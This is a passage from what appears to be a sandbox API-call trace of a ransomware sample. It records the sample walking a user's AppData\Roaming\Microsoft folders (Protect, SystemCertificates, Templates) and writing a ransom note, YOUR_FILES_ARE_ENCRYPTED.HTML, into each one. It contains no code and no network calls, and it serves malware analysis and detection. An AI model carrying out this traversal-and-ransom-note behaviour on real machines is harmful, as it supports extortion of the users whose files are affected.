ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd3f3c550, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d95f90, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x60, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0165.448] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.448] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.449] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.451] CloseHandle (hObject=0x5e4) returned 1 [0165.451] GetProcessHeap () returned 0x270000 [0165.453] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.453] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0165.453] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 68 [0165.453] GetProcessHeap () returned 0x270000 [0165.453] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.453] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0165.454] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0165.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.454] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.454] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 1 [0165.454] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 71 [0165.454] GetProcessHeap () returned 0x270000 [0165.454] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.456] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0165.456] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0165.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.457] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.457] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0165.457] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 84 [0165.457] GetProcessHeap () returned 0x270000 [0165.457] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.458] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0165.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0165.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.458] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.458] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.458] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.458] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0165.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.459] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.461] CloseHandle (hObject=0x304) returned 1 [0165.461] GetProcessHeap () returned 0x270000 [0165.462] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.462] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CRLs", cAlternateFileName="")) returned 1 [0165.462] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 76 [0165.462] GetProcessHeap () returned 0x270000 [0165.462] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.462] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0165.462] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0165.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.463] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.463] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.463] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.463] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0165.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.463] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.465] CloseHandle (hObject=0x304) returned 1 [0165.569] GetProcessHeap () returned 0x270000 [0165.570] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.571] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 1 [0165.571] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 76 [0165.571] GetProcessHeap () returned 0x270000 [0165.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.571] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0165.571] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0165.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.571] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.571] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.571] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.572] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0165.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.572] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.574] CloseHandle (hObject=0x304) returned 1 [0165.575] GetProcessHeap () returned 0x270000 [0165.576] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.576] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 0 [0165.576] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.576] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0165.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.577] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.579] CloseHandle (hObject=0x5b8) returned 1 [0165.580] GetProcessHeap () returned 0x270000 [0165.581] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.581] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 0 [0165.581] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.581] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0165.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.582] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.584] CloseHandle (hObject=0x5e4) returned 1 [0165.584] GetProcessHeap () returned 0x270000 [0165.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.585] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0165.585] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates") returned 59 [0165.585] GetProcessHeap () returned 0x270000 [0165.585] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.585] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates") 